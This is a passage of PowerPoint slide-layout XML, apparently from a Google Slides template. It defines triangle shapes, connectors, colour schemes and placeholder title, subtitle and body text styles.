      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 135"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6981400" y="1724733"/>
            <a:ext cx="5233200" cy="5188000"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="68686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 name="Google Shape;137;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="50500" y="200"/>
            <a:ext cx="12141600" cy="5959600"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4774400" y="1849700"/>
            <a:ext cx="12739200" cy="6479600"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 49428"/>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21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2254400" y="1642733"/>
            <a:ext cx="7683200" cy="78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8000"/>
              <a:buNone/>
              <a:defRPr sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4078400" y="2497823"/>
            <a:ext cx="4035200" cy="13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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42437013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5"/>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6379833" y="2797579"/>
            <a:ext cx="4564800" cy="1149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4533" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6868233" y="1376012"/>
            <a:ext cx="4076400" cy="1149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8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8169400" y="4427067"/>
            <a:ext cx="2775200" cy="69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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Google Shape;18;p3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3752200" y="-1684000"/>
            <a:ext cx="5010000" cy="5578400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;19;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10559833" y="5101033"/>
            <a:ext cx="1728000" cy="1843200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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4772552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5">
  <p:cSld name="Title and text 5">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent6"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 141"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-4587067" y="-1063800"/>
            <a:ext cx="17676800" cy="8985600"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000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 name="Google Shape;143;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="5865300" y="-493733"/>
            <a:ext cx="7688000" cy="74548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 name="Google Shape;144;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="2229967"/>
            <a:ext cx="4035200" cy="78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8000"/>
              <a:buNone/>
              <a:defRPr sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="3296005"/>
            <a:ext cx="4035200" cy="13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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2700000">
            <a:off x="5344497" y="-6021020"/>
            <a:ext cx="7688231" cy="7454603"/>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47" name="Google Shape;147;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6083400" y="-272100"/>
            <a:ext cx="8013600" cy="824240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960688970"/>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6">
  <p:cSld name="Title and text 6">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 148"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386633" y="2993717"/>
            <a:ext cx="5854400" cy="8700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marL="1219170" lvl="1" indent="-423323"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828754" lvl="2" indent="-423323"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2438339" lvl="3" indent="-423323"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3047924" lvl="4" indent="-423323"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3657509" lvl="5" indent="-423323"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4267093" lvl="6" indent="-423323"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4876678" lvl="7" indent="-423323"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5486263" lvl="8" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5557333" y="1284100"/>
            <a:ext cx="5683600" cy="1284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700"/>
              <a:buNone/>
              <a:defRPr sz="4000"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2313318712"/>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7">
  <p:cSld name="Title and text 7">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 151"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="57972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153" name="Google Shape;153;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6698913" y="1920267"/>
            <a:ext cx="4534400" cy="7048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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
